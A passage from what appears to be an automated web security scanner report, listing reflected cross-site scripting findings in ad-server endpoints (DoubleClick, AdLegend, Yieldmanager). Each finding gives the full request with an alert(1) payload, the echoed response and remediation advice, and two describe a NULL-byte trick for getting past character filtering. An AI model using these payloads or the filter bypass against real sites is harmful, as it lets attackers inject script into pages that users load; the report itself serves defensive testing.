P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=1076702/1080850,1090846/1088030,0/0,0/0,0/0; expires=Fri, 05 Aug 2011 22:37:45 GMT; path=/; domain=.adlegend.com
Content-Type: application/x-javascript
Content-Length: 444
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2122025_1080850_300x160_1111357_2122025&af=2095360&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2122025&ml_camp=1076702&ml_crid=2127402&click=http://www.nbc.com/the-apprentice/" TARGET="_blank36136';alert(1)//ba143b688f2">
...[SNIP]...

5.13. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 829b4'-alert(1)-'c4dfa29cc3f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=829b4'-alert(1)-'c4dfa29cc3f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 898
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 20:41:52 GMT
Expires: Sat, 07 May 2011 20:41:52 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/4/1ba/%2a/p;237330678;4-0;0;59094481;3454-728/90;41171150/41188937/1;;~sscs=%3fhttp://adclick.g.doubleclick.net/aclk?
...[SNIP]...
4uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=829b4'-alert(1)-'c4dfa29cc3fhttp://www.dishnetwork.com/redirects/promotion/offer50/default.aspx?WT.mc_id=DDHRNO50MAR7289&&utm_source=horseracingnation&utm_medium=display&utm_campaign=bl">
...[SNIP]...

5.14. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68eb'-alert(1)-'a52fb17444a was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQBb68eb'-alert(1)-'a52fb17444a&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:18 GMT
Content-Length: 7439

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:52 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQBb68eb'-alert(1)-'a52fb17444a&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source
...[SNIP]...

5.15. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c953'-alert(1)-'40ba6933c2b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-40720163692124277c953'-alert(1)-'40ba6933c2b&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:48 GMT
Content-Length: 7435

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:53 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
uYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-40720163692124277c953'-alert(1)-'40ba6933c2b&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source%3Dhorseracingnation%26utm_medium%3Ddisplay%26utm_campaign%3Dbl\">
...[SNIP]...

5.16. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405e3'-alert(1)-'c169dfd3f8e was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0405e3'-alert(1)-'c169dfd3f8e&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:32 GMT
Content-Length: 924

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/c/1ba/%2a/z;237330678;3-0;0;59094481;3454-728/90;41171149/41188936/1;;~sscs=%3fhttp://adclick.g.doubleclick.net/aclk?
...[SNIP]...
W5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0405e3'-alert(1)-'c169dfd3f8e&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source%3Dhor
...[SNIP]...

5.17. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dbff'-alert(1)-'40368e22d83 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ2dbff'-alert(1)-'40368e22d83&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:43 GMT
Content-Length: 7435

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:53 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
OWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ2dbff'-alert(1)-'40368e22d83&client=ca-pub-4072016369212427&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source%3Dhorseracingnation%26utm_medium%3Ddisplay%2
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c3452"-alert(1)-"e0b127a5f82 was submitted in the sig parameter. This input was echoed as c3452"-alert(1)-"e0b127a5f82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=%00c3452"-alert(1)-"e0b127a5f82&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7243
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 20:41:39 GMT
Expires: Sat, 07 May 2011 20:41:39 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:52 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
W9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=%00c3452"-alert(1)-"e0b127a5f82&client=ca-pub-4072016369212427&adurl=http://www.dishnetwork.com/redirects/promotion/offer50/default.aspx?WT.mc_id=DDHRNO50MAR7289&&utm_source=horseracingnation&utm_medium=display&utm_campaign=bl");
v
...[SNIP]...

5.19. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00681c0"-alert(1)-"96a36e6e0e6 was submitted in the sz parameter. This input was echoed as 681c0"-alert(1)-"96a36e6e0e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L%00681c0"-alert(1)-"96a36e6e0e6&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7374
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 20:41:10 GMT
Expires: Sat, 07 May 2011 20:41:10 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:51 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/7/1bd/%2a/v%3B237330678%3B5-0%3B0%3B59094481%3B3454-728/90%3B41171151/41188938/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L%00681c0"-alert(1)-"96a36e6e0e6&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJs
...[SNIP]...

5.20. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5ce2'-alert(1)-'27755194820 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=Le5ce2'-alert(1)-'27755194820&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:14 GMT
Content-Length: 919

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/c/1ba/%2a/k;237330678;0-0;0;59094481;3454-728/90;41170091/41187878/1;;~sscs=%3fhttp://adclick.g.doubleclick.net/aclk?sa=Le5ce2'-alert(1)-'27755194820&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJs
...[SNIP]...

5.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f984d"-alert(1)-"cae446732d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

